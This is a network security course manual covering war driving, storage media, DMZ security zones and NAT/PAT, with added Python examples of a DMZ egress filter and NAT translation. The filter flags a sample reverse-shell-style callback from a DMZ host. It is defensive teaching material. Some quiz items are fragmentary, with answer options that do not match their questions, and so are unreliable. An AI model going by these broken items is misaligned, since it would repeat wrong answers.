Another way to secure the infrastructure is to implement a redundant network (having multiple devices in the same function). In this instance, if a network device becomes compromised, it does not necessarily mean that the entire network is compromised. A backup device can be available to take over the duties of the disabled piece of equipment.

War driving

The media has covered many cases of war driving. Literally, war driving is driving around with a laptop whose wireless network interface card is scanning for (or, in monitor mode, capturing) unsecured wireless signals. Today, hackers are war driving, or LAN-jacking, wireless networks for anonymous and free high-speed Internet access or purely for access to a network. War driving requires no elaborate software or hardware. An ordinary wireless NIC easily latches on to the beacons of open wireless networks. Using a Global Positioning System (GPS) receiver in conjunction with wireless network interface cards, hackers are mapping major metropolitan areas and compiling lists of wireless networks, both secured and unsecured. One of the best ways to defend against such attacks is to use a VPN or other encryption technology when using wireless LANs, in addition to enabling the strongest link-layer encryption and authentication the equipment supports rather than leaving the network open.
A-2:
C D
2 What is the most likely area for an intruder to try to gain access to physical network media?
A non-secure area, such as the space between floors where coaxial or twisted pair media may be connecting separate floors in an office building.
3 What are some of the ways you can minimize eavesdropping of electromagnetic emissions?
Use fiber optic cable and/or encrypt data.
Exhibit 10-6: Various storage media

Floppy disks

The first floppy disks were not rigid or encased in hard plastic as they are today. The size of the floppy has changed several times: the original floppy disk measured 8 inches across, a 5.25-inch disk was then developed, and finally the 3.5-inch disk that is now commonly used. Other types of floppy disks also exist, but the most common is the 3.5-inch, high density, which holds about 1.44 MB of data. The 3.5-inch floppy disk has a circular magnetic piece of plastic, which is placed inside a rigid plastic case for protection. To help avoid data loss, carrying disks in a waterproof case helps prevent water or dust from damaging the disk. Keep floppy disks away from anything that might hold a magnetic or electrical field, such as a mobile phone, radio, metal tools, or paper clips that have been stored in a magnetic paper clip holder. Because floppy disks are made of magnetic material, any other magnetic material can erase or damage data on the floppy disk. Store floppy disks in an area with a temperature between 32 and 140 F. Although the floppy disk was once the primary type of magnetic removable media, it is quickly being replaced by larger-capacity magnetic disks.

Cartridge disks

Cartridge drives were popular in the 1990s. They gave users more capacity than the 1.44 MB floppy disks had. Users were comfortable with removable disk storage: they had been using floppy disks. Removable disk storage has changed a lot over the years, from the basic floppy disk to the Bernoulli box to the REV drive. The popularity of cartridge drives has declined with the rise in availability of CD and DVD recordable media and drives.
The Iomega Company has created many of the cartridge drives and related media. The first of these was the Bernoulli Box. It was originally offered with 5, 10, and 20 MB disk choices. Over the years the disk capacity increased to 230 MB. The disks were Mylar disks (like those in a floppy disk), in approximately 5.25-inch sturdy cartridge cases.

Zip drives

Another popular solution was the Iomega Zip drive. The cartridge was slightly larger than a 3.5-inch floppy disk. The original capacity was 100 MB; later versions were 250 and 750 MB. The 750 MB drive could read 100 MB cartridges but not write to them. The 250 MB drive could read and write 100 MB cartridges, but more slowly than 250 MB cartridges. It was available with parallel, SCSI, and USB interface options. Zip disks were prone to getting dirty, and the drives were prone to heads becoming misaligned, which caused problems reading the disks. The head arm would be rapidly snapped into the drive and out again, creating a click; this became known as the click of death. It often tore the edge of the disk and sometimes damaged the head as well. Damaged disks could also damage other drives if the disk was tried in another drive.

Exhibit 10-7: Zip drive and cartridge

Jaz drives

Another storage solution Iomega introduced was the Jaz drive. It had 1 GB and 2 GB cartridges that used Winchester hard drive technology. They were available in SCSI and USB interface models.

REV drives

The current Iomega offering is the 35 GB REV drive. The read/write heads and controller are contained in the drive. They can be connected via USB, SCSI, FireWire, and ATAPI interfaces.
Exhibit 10-8: Compact disc

A CD is a plastic disc covered by a layer of aluminum and a layer of acrylic. Data is recorded onto a CD by creating very small bumps in the aluminum layer on long tiny tracks. The data is then read by a laser beam. As the laser hits the bumps in the tracks, an optical reader called an optoelectronic sensor detects the changing pattern of reflected light from the bumps in the aluminum coating. This pattern is then translated into bits and sent to the computer. Although many CDs are produced professionally, it is now possible to make a CD with a personal computer. CD writers, or burners, record the data onto the disc, creating the marks that are read by the CD drive. A typical CD can store 700 MB of data, which is approximately the same as 486 standard floppy disks. This means a CD can store over three million pages of text or 20,000 graphic images. CDs are commonly used to store multimedia, such as music or video, which need large amounts of storage space. The most common forms of CDs are those that hold recorded music.
CD-ROMs

The most common type of CD used with computers is the CD-ROM. Material can be written or recorded to the disc only once, usually by a professional CD-ROM producing company. CD-ROMs hold prerecorded materials to be used on a computer, such as software, graphic images, short video clips, or audio. When you purchase a new piece of software, it normally comes on a CD-ROM and is installed using the CD-ROM drive.

CD-Rs

Compact disc-recordable (CD-R) is another type of CD. It is similar to audio CDs and CD-ROMs. However, unlike a CD or a CD-ROM, which is purchased prerecorded, a CD-R is a blank CD. Data is recorded onto the CD-R by using a CD-R drive. CD-Rs are perfect for storing large amounts of data. Like other types of CDs, CD-Rs hold about 700 megabytes of data. They can be used to store older documents or files that you want to save but do not need to access daily. Many people use CD-Rs to distribute files to others and to back up files. Although CD-R discs appear to be identical to other types of CDs, instead of having an aluminum layer on which the data has been prerecorded using bumps, a CD-R has a layer of light-sensitive dye on top of a layer of reflective gold. Using the CD-R drive, the data is burned or recorded on the disc with a high-powered laser beam. Instead of creating bumps in the aluminum layer like a prerecorded CD, the laser changes the color of the light-sensitive dye by pulsing in patterns. CD-Rs can have data recorded onto them only one time. Hence, they are called write once, read many (WORM) media.

CD-RWs

The next step in CD technology is the compact disc-rewriteable (CD-RW). A CD-RW disc is very similar to a CD-R disc, except that it can be recorded onto more than once. The recording layer is different and can be rewritten multiple times, so you can write, delete, and rewrite to the same CD. The CD-RW drive is similar to the CD-R drive, with the additional ability to record over data on the same disc.
Both CD-RW discs and CD-RW drives are more expensive to purchase than CD-R discs and drives.

DVDs

The DVD is becoming a popular type of permanent optical storage. Primarily used to store full-length feature films, the DVD is similar to a CD, but with a much larger data capacity. A DVD holds about seven times as much data as a regular CD. Like CDs, DVDs are also made out of plastic with a reflective metal layer, covered by a thin layer of clear polymer. The difference is that the tracks on a DVD are much thinner and placed closer to each other, so many more tracks fit on a disc, allowing more space for recorded data. In addition, DVDs can be recorded on both sides, doubling the amount of storage space available.
Exhibit 10-9: Solid-state storage media

External flash memory readers present a flash memory card to the computer just as if it were an additional hard drive. Because the operating system mounts the card as a drive, using the files on it is just like using any other file on the computer. Removable solid-state storage media can be used with devices, or drives, that are either internal or external. These devices communicate with the computer through interfaces in the form of cables and connectors that connect the device to the CPU or the motherboard. Because there are no moving parts to break, solid-state media is more reliable and durable than conventional hard disk drives. It requires no battery to retain its data. Many other devices, such as wireless phones and personal digital assistants (PDAs), also use solid-state media for storage. There currently are several popular types of solid-state media, including CompactFlash, SmartMedia, memory sticks, and secure digital/multimedia cards.

CompactFlash

The CompactFlash card is a very small type of storage, measuring only 1.7 inches by 1.4 inches, and less than a 1/4 of an inch thick. It weighs a mere half-ounce. Even with this small size, a CompactFlash card currently can store up to 4 GB of data. Many digital devices cannot handle this large storage size, so a more common storage capacity is between 8 and 128 MB.

SmartMedia

The SmartMedia card is similar to the CompactFlash, but is even thinner and lighter. Many devices use SmartMedia cards, including digital still cameras, MP3 recorders, and newer printing devices. These cards can store only up to 64 MB of data, far less than CompactFlash cards. However, SmartMedia cards are less expensive than CompactFlash cards. Like CompactFlash cards, SmartMedia cards have a high data transfer rate and are resistant to extreme weather conditions.
Memory Stick

Another popular type of removable data storage is the Memory Stick. About the size of a stick of chewing gum, the Memory Stick can hold up to 8 GB of data. Memory Sticks are commonly used with digital still cameras, digital music players (MP3), digital voice recorders, and other digital devices. It has some of the same features as the CompactFlash card and the SmartMedia card, including a high data transfer rate, resistance to extreme temperatures, and high storage capacity.

Secure digital/multimedia cards

Secure digital/multimedia cards are primarily used in MP3 players and digital cameras. These SD/MMC memory cards are about the same size as SmartMedia cards, but thicker, and have their own controller like CompactFlash cards. These cards can store up to 8 GB.
Catastrophic loss
When dealing with the various types of storage media, it is important to try to mitigate the risk of a catastrophic loss of data. The simplest way to do this is to make backup copies of any sensitive information and store the copies in a safe place. Information that is so vital that business operation could be threatened if lost should be stored at a separate, secure location, preferably in a fire safe. It is also very important to use a type of media that is less likely to be corrupted or damaged, with solid-state media being the best choice in this instance. Magnetic media is very easily damaged or erased, and optical media is easily scratched and made unreadable. No media is immune, though: flash cells wear out with repeated writes and can lose their charge over years of unpowered storage, so backups on any media should be kept in more than one copy and periodically verified as readable.
Encryption
To guarantee that sensitive information does not fall into the wrong hands, any organization should implement a thorough encryption policy. At no time should business-critical information be stored in an unencrypted fashion. All of the media discussed above are compatible with encryption technologies. The key to a successful encryption policy is to educate the entire organization as to the importance of safeguarding sensitive data. If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised.
B-1:
B
C
D

2 A(n) ___________ detects the changing pattern of reflected light from the bumps in the aluminum coating on a CD.
A
B
C
D
Topic B
Review questions
1 Describe coaxial cable construction.
It is composed of a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield.
5 Cat 5 twisted pair cables support 1000 Mbps Ethernet. True or False?
False. Cat 5 supports 100 Mbps. Cat 6 supports 1000 Mbps.
6 Fiber optic cable is more susceptible to damage than coax or twisted pair cable. True or False?
True
8 List potential damage that can be caused by altering data flows on the network.
Data corruption, sabotage of core business plans, impersonation of corporate nodes to gain network access.
12 List examples of storage media that use light and reflection to transmit data.
CD-ROM, CD-R, CD-RW, and DVD.
14 If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised. True or False?
True
private network.
D Describe VLANs and explain their
Security zones
Any network that is connected (directly or indirectly) to your organization, but is not controlled by your organization, represents a risk. To alleviate these risks, security professionals create security zones, which divide the network into areas of similar levels of security (trusted, semi-trusted, and untrusted). You create the security zones by putting all your publicly accessed servers in one zone and restricted-access servers in another, then separating both from an external network like the Internet using firewalls. The three main zones into which networks are commonly divided are the intranet, perimeter network, and extranet.
Intranet
The intranet is the organizations private network; this network is fully controlled by the company and is trusted. The intranet typically contains confidential or proprietary information relevant to the company and, consequently, restricts access to internal employees only. The private internal LAN(s) are protected from other security zones by one or more firewalls, which restrict incoming traffic from both the public and DMZ zones.
As an additional safeguard, intranets use private address space (RFC 1918). These IP addresses are reserved for use by any internal network and are not routed on the Internet. The following address ranges are reserved:
Class A  10.0.0.0 to 10.255.255.255
Class B  172.16.0.0 to 172.31.255.255
Class C  192.168.0.0 to 192.168.255.255
Private addressing by itself is not an access control: internal hosts stay unreachable only as long as the perimeter routers and firewalls refuse to forward traffic to or from these ranges, so those filters are what actually prevent intrusion.
Additional security measures include:
Installing anti-virus software
Removing unnecessary services from mission-critical servers
Auditing the critical systems' configurations and resources
DMZ
Demilitarized zones are semi-trusted networks that are owned and controlled by the company, but have a lower level of security than the intranet. (The term comes from the geographic buffer zone that was set up between North Korea and South Korea following the UN police action in the early 1950s.) DMZs are commonly used by companies that want to host their own Internet services while preventing access to their internal networks. The DMZ is typically a network segment consisting of a combination of firewalls, bastion hosts, and devices accessible to Internet traffic, such as proxy servers, Web (HTTP) servers, FTP servers, SMTP (e-mail) servers, and DNS servers. This zone also serves as a buffer between the Internet and the intranet. Exhibit 11-1 and Exhibit 11-2 show two sample configurations for the perimeter network. In Exhibit 11-1, the DMZ is isolated by two firewalls, one facing the Internet, the other facing the intranet. This configuration protects the Web server with a firewall that allows HTTP for Web services but restricts all other protocols. A separate firewall isolates the intranet from all Internet traffic. This implementation of the DMZ is called a screened subnet.
Not all organizations require a DMZ, so explain to students that a DMZ is necessary only if a company wishes to host its own public resources such as Web servers and DNS servers. Many organizations host their Web server and other public servers with a third party, thereby avoiding the necessity of a DMZ.
In Exhibit 11-2, a single firewall with three network interfaces (a three-NIC firewall) separates the intranet, the DMZ and the external network. One device protects both the perimeter network and the intranet. This configuration is not as secure as the one in Exhibit 11-1: a failure or compromise of the three-NIC firewall can compromise the perimeter network and the intranet simultaneously.
Exhibit 11-2: Security zones created by a three-NIC firewall

Internet users can access only the hosts on the DMZ. If an outside user penetrates a DMZ host's security, Web pages or FTP files might be corrupted, but, provided the rules between the DMZ and the intranet hold, no other company information would be exposed.

Filter outgoing traffic

Filtering traffic that originates from a DMZ impairs an attacker's ability to make a vulnerable host communicate with the attacker's host. An attacker often has the vulnerable DMZ host open an outgoing connection back to the attacker's host to receive more commands to run. Blocking this initial outbound connection makes life harder for the attacker. Applying filtering to traffic leaving the DMZ can also keep a compromised host from being used as a traffic-generating agent in distributed denial-of-service attacks.

Because you know that DMZ hosts should not be initiating outbound traffic, you can trigger an intrusion detection alarm whenever the rule is engaged. Likewise, because you know what traffic should originate on your hosts, you can construct filters that notify you when someone tries to initiate traffic outside of what is expected. This is a key principle in constructing intrusion detection alarms and can be a highly effective way of learning that a host has been compromised. The most basic method of limiting outbound traffic is to construct a firewall rule or router filter that specifically drops traffic initiated from devices on the DMZ network interface to the Internet.
Another good candidate for filtering is traffic coming in on the DMZ interface of the firewall or router that carries a source IP address outside the DMZ network number. This traffic is almost always spoofed and is often associated with denial-of-service attacks. When dropping traffic under either rule, the firewall or router should be configured to log the event or raise a rule alert so that notification of a potential system compromise reaches an appropriate administrator. A solid understanding of what kind of network traffic is expected is essential for this kind of configuration to work. The key is to limit traffic to only authorized access. Remember that several common protocols initiate outbound connections: an FTP server in active mode opens the data connection back to the client, and a DNS server in the DMZ sends queries to other name servers. Special consideration should be given to these kinds of protocols. Applying these recommendations can make an attacker's job much more difficult and give an administrator early notification when a host has been compromised.
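The two DMZ rules described above (default-deny egress with explicit exceptions, and anti-spoofing on the DMZ interface), as an added example in Python that is not part of the course manual. The DMZ and intranet prefixes, the permitted egress table and the sample flows are all constructed for the example; a real deployment would express the same policy in the firewall's own rule language and feed the alerts to the IDS or log collector.

```python
"""Egress and anti-spoofing filter for the DMZ leg of a firewall.

Added example (not from the course manual): models the two rules the text
recommends and runs them over a constructed set of connection records.
Addresses, ports and the permitted-egress table are assumed values.
"""
import ipaddress
from dataclasses import dataclass

DMZ_NET = ipaddress.ip_network("203.0.113.0/24")   # assumed DMZ subnet
INTRANET = ipaddress.ip_network("10.0.0.0/8")      # assumed intranet range

# Outbound connections a DMZ host is legitimately expected to initiate.
# Anything else initiated from the DMZ is dropped and alerted on, because a
# DMZ host "calling home" is a strong indicator of compromise.
EXPECTED_EGRESS = {
    # (source host, protocol, destination port): reason
    (ipaddress.ip_address("203.0.113.25"), "tcp", 25): "mail relay: outbound SMTP",
    (ipaddress.ip_address("203.0.113.53"), "udp", 53): "DNS server: queries to other name servers",
    (ipaddress.ip_address("203.0.113.53"), "tcp", 53): "DNS server: large replies / zone transfers",
}

@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    dport: int
    syn: bool   # True for the packet that initiates a connection

def filter_dmz_flow(flow):
    """Decide one packet seen on the DMZ interface: returns (action, alert-or-None)."""
    src = ipaddress.ip_address(flow.src)
    dst = ipaddress.ip_address(flow.dst)
    # Rule 1: anti-spoofing. A packet entering on the DMZ interface must carry a
    # DMZ source address; anything else is spoofed (commonly DDoS traffic).
    if src not in DMZ_NET:
        return "drop", f"SPOOF src={flow.src} seen on DMZ interface"
    # Replies to connections that came in from outside are allowed through;
    # only connection-initiating packets are subject to the egress policy.
    if not flow.syn:
        return "permit", None
    if dst in INTRANET:
        return "drop", f"DMZ->INTRANET initiation {flow.src}->{flow.dst}:{flow.dport}"
    # Rule 2: default-deny egress from the DMZ to the Internet, with exceptions.
    if (src, flow.proto, flow.dport) in EXPECTED_EGRESS:
        return "permit", None
    return "drop", f"UNEXPECTED EGRESS {flow.src}->{flow.dst}:{flow.dport}/{flow.proto}"

def apply_policy(flows):
    """Run the policy over a list of flows; returns (decisions, alerts)."""
    decisions, alerts = [], []
    for f in flows:
        action, alert = filter_dmz_flow(f)
        decisions.append(action)
        if alert:
            alerts.append(alert)
    return decisions, alerts

# Constructed sample traffic (not captured data).
SAMPLE_FLOWS = [
    Flow("203.0.113.25", "198.51.100.9", "tcp", 25, True),     # mail relay: expected, permit
    Flow("203.0.113.80", "198.51.100.7", "tcp", 4444, True),   # web server calling home: drop + alert
    Flow("203.0.113.80", "198.51.100.7", "tcp", 51000, False), # reply inside an inbound session: permit
    Flow("192.0.2.200", "198.51.100.9", "udp", 53, True),      # non-DMZ source on DMZ leg: drop + alert
    Flow("203.0.113.80", "10.1.2.3", "tcp", 445, True),        # DMZ host pivoting inward: drop + alert
]

if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        action, alert = filter_dmz_flow(f)
        print(f"{action:6} {f.src}->{f.dst}:{f.dport}/{f.proto}  {alert or ''}")
```

The reply packet in the third sample is permitted only because the policy distinguishes connection-initiating packets from the rest; a stateless filter that could not make that distinction would have to choose between blocking the DMZ's legitimate replies and allowing the reverse shell.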
Extranet
The extranet is an extension of your private network or intranet. It allows you to share your business information or operations with another business, such as a supplier, vendor, partner, or customer. This is often referred to as business-to-business (B2B) communications or networks, because one company uses the internal resources and services of another. An extranet requires security and privacy. These are accomplished through firewall management, the issuance and use of digital certificates or similar means of user authentication, encryption of messages, and the use of VPNs that tunnel through the public network. Companies can use an extranet to:
- Exchange large volumes of data using Electronic Data Interchange (EDI).
- Share product catalogs exclusively with wholesalers or those in the trade.
- Collaborate with other companies on joint development efforts.
- Jointly develop and use training programs with other companies.
- Provide or access services provided by one company to a group of other companies, such as an online banking application managed by one company on behalf of affiliated banks.
- Share news of common interest exclusively with partner companies.
Do it! A-1:

2 A demilitarized zone (DMZ) is used by a company that wants to host its own Internet services while preventing access to its private network. True or false?
True

3 The DMZ is the most insecure area of your network infrastructure. What hardware is reserved for this area? (Choose all that apply.)
A Print servers
B Firewalls
C Public Internet servers, such as HTTP, FTP, and Gopher servers
D Mail servers

Filtering recommendations for the DMZ covered in this topic:
- Filter traffic originating from a DMZ.
- Construct filters that notify you when someone tries to initiate traffic outside of what is expected.
- Specifically drop traffic initiated from devices on the DMZ network interface to the Internet.
- Filter the traffic coming in from the DMZ interface of the firewall or router that appears to have a source IP address of a network other than the DMZ network number.
NAT
Explanation Network Address Translation (NAT) is a service that converts internal private IP addresses to public Internet addresses. Private addresses are not routable on the Internet and are not directly accessible from it. NAT was originally developed as an interim solution to IPv4 address depletion, allowing globally registered IP addresses to be reused or shared by several hosts. The classic NAT defined by RFC 1631 maps IP addresses from one realm to another; a more recent definition is found in RFC 3022. NAT serves two main purposes:
- It provides a degree of protection by hiding internal IP addresses: an outside host cannot reach an inside host for which no translation exists. (NAT is not a substitute for a firewall's policy, though; the two are usually combined on the same edge device.)
- It enables a company to use more internal IP addresses. Because they're only used internally, there's no possibility of conflict with IP addresses used by other companies and organizations.
Although it can be used to translate between any two address realms, NAT is most often used to map IPs from the private address spaces defined by RFC 1918, as shown here:

Class   Private address range
A       10.0.0.0 to 10.255.255.255
B       172.16.0.0 to 172.31.255.255
C       192.168.0.0 to 192.168.255.255
These addresses were reserved for use by private networks. Enterprises can freely use these addresses to avoid obtaining registered public addresses. Because private addresses can be reused by other organizations, they are not unique and are nonroutable over a common infrastructure. When communication between a privately addressed host and a public network (such as the Internet) is needed, address translation is required. This is where NAT comes in. NAT routers sit on the border between private and public networks, converting private addresses in each IP packet into legally registered public ones. They also provide transparent packet forwarding between addressing realms. The packet sender and receiver (should) remain unaware that NAT is taking place. Today, NAT is commonly supported by WAN access routers and firewalls situated at the network edge.
Static NAT
NAT works by creating bindings between addresses. In the simplest case, a one-to-one mapping might be defined between public and private addresses. Known as static NAT, this can be accomplished by a straightforward, stateless implementation that transforms only the network part of the address, leaving the host part intact. The rest of the packet must also be considered during translation. The IP header checksum must, of course, be recalculated. Because TCP (and UDP) checksums are computed over a pseudo-header containing the source and destination IP addresses in addition to the transport segment, NAT must also regenerate the transport-layer checksum; a gateway that rewrote only the address field would produce packets the receiver discards as corrupt.
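The checksum point above, as an added example in Python that is not part of the manual: it builds a minimal IPv4/TCP SYN, rewrites the source address the way a static NAT gateway would, and shows that the receiver rejects the packet unless both the IP header checksum and the pseudo-header TCP checksum are recomputed. The inside and public addresses are assumed values.

```python
"""IP and TCP checksum recalculation for a static NAT rewrite.

Added example (not from the manual). Builds a minimal IPv4/TCP segment,
rewrites its source address as a static NAT gateway would, and checks both
checksums the way a receiver does. Addresses are assumed values.
"""
import struct
import ipaddress

def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, then inverted."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def tcp_checksum(src_ip: str, dst_ip: str, tcp_segment: bytes) -> int:
    """TCP checksum covers a pseudo-header (src, dst, zero, proto 6, length) + segment."""
    pseudo = struct.pack("!4s4sBBH",
                         ipaddress.ip_address(src_ip).packed,
                         ipaddress.ip_address(dst_ip).packed,
                         0, 6, len(tcp_segment))
    return ones_complement_sum(pseudo + tcp_segment)

def build_tcp(src_ip, dst_ip, sport, dport, payload=b""):
    """20-byte TCP header (SYN) + payload with a valid checksum at offset 16."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload

def build_ipv4(src_ip, dst_ip, tcp_bytes):
    """20-byte IPv4 header (IHL=5, proto 6) with a valid checksum at offset 10."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp_bytes), 0x1234, 0x4000, 64, 6, 0,
                      ipaddress.ip_address(src_ip).packed, ipaddress.ip_address(dst_ip).packed)
    csum = ones_complement_sum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + tcp_bytes

def verify(packet):
    """A receiver's check: (ip_ok, tcp_ok). A valid checksum makes the sum fold to zero."""
    ip_hdr, tcp = packet[:20], packet[20:]
    src = str(ipaddress.ip_address(ip_hdr[12:16]))
    dst = str(ipaddress.ip_address(ip_hdr[16:20]))
    return ones_complement_sum(ip_hdr) == 0, tcp_checksum(src, dst, tcp) == 0

def static_nat_outbound(packet, inside_ip, public_ip, recompute=True):
    """Rewrite the source address for one static binding; recompute checksums if asked."""
    if packet[12:16] != ipaddress.ip_address(inside_ip).packed:
        return packet                                   # no binding for this source: untouched
    ip_hdr, tcp = bytearray(packet[:20]), bytearray(packet[20:])
    ip_hdr[12:16] = ipaddress.ip_address(public_ip).packed
    if recompute:
        dst = str(ipaddress.ip_address(bytes(ip_hdr[16:20])))
        ip_hdr[10:12] = b"\x00\x00"
        ip_hdr[10:12] = struct.pack("!H", ones_complement_sum(bytes(ip_hdr)))
        tcp[16:18] = b"\x00\x00"                        # TCP sum also changes: pseudo-header moved
        tcp[16:18] = struct.pack("!H", tcp_checksum(public_ip, dst, bytes(tcp)))
    return bytes(ip_hdr + tcp)

# Constructed sample: an inside host opening HTTP to an Internet server.
INSIDE, PUBLIC, SERVER = "10.10.10.5", "203.0.113.1", "198.51.100.9"
SAMPLE = build_ipv4(INSIDE, SERVER, build_tcp(INSIDE, SERVER, 40000, 80, b"GET / HTTP/1.0\r\n"))

if __name__ == "__main__":
    print("original   ", verify(SAMPLE))
    print("no recompute", verify(static_nat_outbound(SAMPLE, INSIDE, PUBLIC, recompute=False)))
    print("recomputed ", verify(static_nat_outbound(SAMPLE, INSIDE, PUBLIC)))
```

The same rewrite is what a gateway does in the reverse direction for replies, substituting the inside address as destination; the destination-address change lands in the pseudo-header too, so the transport checksum is regenerated on both paths.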
Dynamic NAT
More often, a pool of public IP addresses is shared by an entire private IP subnet in a form of NAT called dynamic NAT. Edge devices that run dynamic NAT create bindings on the fly by building a NAT table. Connections initiated by private hosts are assigned a public address from a pool. As long as the private host has an outgoing connection, it can be reached by incoming packets sent to this public address. After the connection is terminated (or a timeout is reached), the binding expires, and the address is returned to the pool for reuse. Dynamic NAT is more complex because state must be maintained, and new connections must be rejected when the pool is exhausted. However, unlike static NAT, dynamic NAT enables address reuse, reducing the demand for legally registered public addresses.

The potential problem with dynamic NAT (or static NAT, for that matter) is that there are fewer public addresses than inside hosts. If you have 254 public addresses, for example (a class C network), you might assign 3 or 4 of those to static devices, like Web servers and DNS servers. That leaves 250 addresses for dynamic NAT. But what if your organization has 500 hosts? If more than 250 want to use the Internet at the same time, you will run out of public addresses. The solution? PAT.

Port Address Translation (PAT, also called NAT overload) lets many inside hosts share a single public address by rewriting the source port as well as the source address, so that each binding is identified by the (address, port) pair. Since a port number is 16 bits long, a single public IP address can in principle carry as many as 65,536 concurrent port bindings (in practice somewhat fewer, since the gateway reserves some ports for its own use).
In some cases, static NAT, dynamic NAT, PAT, and even bi-directional NAT or PAT might be used together. For example, an enterprise might locate public Web servers outside of the firewall on a DMZ, while placing a mail server and clients on the private inside network, behind a NAT firewall. Furthermore, suppose there are applications within the private network that periodically connect to the Internet for long periods. In this case:
- Web servers can be reached from the Internet without NAT, because they live in public address space.
- Simple Mail Transfer Protocol (SMTP) sent to the private mail server from the Internet requires incoming translation. Because this server must be continuously accessible through a public address associated with its Domain Name System (DNS) entry, the mail server requires a static mapping (either a limited-purpose virtual server table or static NAT).
- For most clients, public address sharing is usually practical through dynamically acquired addresses (either dynamic NAT with a correctly sized address pool, or PAT).
- Applications that hold onto dynamically acquired addresses for long periods could exhaust a dynamic NAT address pool and block access by other clients. To prevent this, long-running applications might use PAT because it enables higher concurrency (thousands of port mappings per IP address).
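The combined deployment just described (a static binding for the mail server, a dynamic pool for clients, and PAT once the pool runs dry), as an added example in Python that is not part of the manual. The NAT table, the two-address pool, the overload address and the sequential PAT port allocation are all assumptions made for the example; real gateways also age bindings out on timeouts, which is omitted here.

```python
"""Static NAT, dynamic NAT pool exhaustion and PAT fallback in one table.

Added example, not part of the manual. A minimal NAT gateway that keeps a
static binding for the mail server, hands out dynamic public addresses from
a small pool, and falls back to PAT on one overload address when the pool
is exhausted. Addresses, pool size and port allocation are assumed values.
"""
import ipaddress
from itertools import count

class NatGateway:
    def __init__(self, pool, overload_ip, static=None):
        self.pool = [ipaddress.ip_address(a) for a in pool]       # free dynamic addresses
        self.overload_ip = ipaddress.ip_address(overload_ip)
        self.static = {ipaddress.ip_address(k): ipaddress.ip_address(v)
                       for k, v in (static or {}).items()}
        self.dynamic = {}        # inside ip -> public ip, while at least one session is open
        self.dynamic_refs = {}   # inside ip -> number of open sessions
        self.pat = {}            # (inside ip, inside port) -> public port on overload_ip
        self.pat_reverse = {}    # public port -> (inside ip, inside port)
        self._ports = count(1024)  # assumption: PAT ports handed out sequentially from 1024

    def outbound(self, inside_ip, inside_port):
        """Translate a new outbound session; returns (public ip, public port, binding kind)."""
        ip = ipaddress.ip_address(inside_ip)
        if ip in self.static:                       # one-to-one, never expires
            return self.static[ip], inside_port, "static"
        if ip in self.dynamic:                      # host already holds a pool address
            self.dynamic_refs[ip] += 1
            return self.dynamic[ip], inside_port, "dynamic"
        if self.pool:                               # pool address available: bind it
            pub = self.pool.pop(0)
            self.dynamic[ip] = pub
            self.dynamic_refs[ip] = 1
            return pub, inside_port, "dynamic"
        # Pool exhausted: overload one public address by rewriting the port as well.
        key = (ip, inside_port)
        if key not in self.pat:
            port = next(self._ports)
            if port > 65535:
                raise RuntimeError("PAT port space exhausted")
            self.pat[key] = port
            self.pat_reverse[port] = key
        return self.overload_ip, self.pat[key], "pat"

    def inbound(self, public_ip, public_port):
        """Map a packet arriving from the Internet to an inside host, or None if unsolicited."""
        pub = ipaddress.ip_address(public_ip)
        for inside, mapped in self.static.items():
            if mapped == pub:
                return inside, public_port
        for inside, mapped in self.dynamic.items():
            if mapped == pub:
                return inside, public_port
        if pub == self.overload_ip and public_port in self.pat_reverse:
            return self.pat_reverse[public_port]
        return None                                  # no binding: the gateway drops it

    def close(self, inside_ip):
        """A session ended: release the dynamic address once its last session closes."""
        ip = ipaddress.ip_address(inside_ip)
        if ip in self.dynamic:
            self.dynamic_refs[ip] -= 1
            if self.dynamic_refs[ip] == 0:
                self.pool.append(self.dynamic.pop(ip))
                del self.dynamic_refs[ip]

def demo():
    """Walk through pool exhaustion and PAT fallback; returns (gateway, list of translations)."""
    gw = NatGateway(pool=["203.0.113.10", "203.0.113.11"], overload_ip="203.0.113.1",
                    static={"10.0.0.25": "203.0.113.25"})
    results = [gw.outbound("10.0.0.25", 25)]                                         # mail server: static
    results += [gw.outbound("10.0.0.101", 40000), gw.outbound("10.0.0.102", 40001)]  # pool now empty
    results += [gw.outbound("10.0.0.103", 40002), gw.outbound("10.0.0.104", 40002)]  # PAT: same inside port, distinct public ports
    gw.close("10.0.0.101")                                                           # frees 203.0.113.10
    results.append(gw.outbound("10.0.0.105", 40003))                                 # gets the freed address
    return gw, results

if __name__ == "__main__":
    for pub, port, kind in demo()[1]:
        print(f"{kind:8} {pub}:{port}")
```

Note what `inbound` returns for a port nobody mapped: `None`. That dropped-by-default behaviour for unsolicited traffic is the "type of firewall" NAT provides, and also the reason the mail server needs its static binding.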
Do it! B-1:

1 Options:
A Provides a type of firewall by hiding internal IP addresses.
B Enables a company to use more internal IP addresses. Because they're used internally only, there's no possibility of conflict with IP addresses used by other companies and organizations.
C Allows a company to combine multiple ISDN connections into a single Internet connection.
D All of the above.

4 Which of the following protocols map private IP addresses to registered IP addresses on a one-to-one basis?

Options:
A 10.0.0.0 through 10.255.255.255
B 172.16.0.0 through 172.31.255.255
C 192.168.0.0 through 192.168.255.255
D All of the above
Do it! B-2:

Setup: For this activity, each student requires a partner. Each pair requires two Windows Server 2003 servers, a Windows Server 2003 server CD, Internet access, and a crossover cable. Important: Students should not connect the crossover cable until instructed to do so.

Here's how
2 Choose Open. (This opens Network Connections.)
3 Right-click the second network interface and choose Properties. (This card is not connected to the classroom network.)
4 Double-click Internet Protocol (TCP/IP).
5 With the appropriate setting selected, click OK, then click OK again.
6 Right-click the second network interface and choose Rename.
7 Enter Internal as the name and press Enter.
Start Routing and Remote Access, if necessary.
14 Select the External interface in the list of available interfaces.
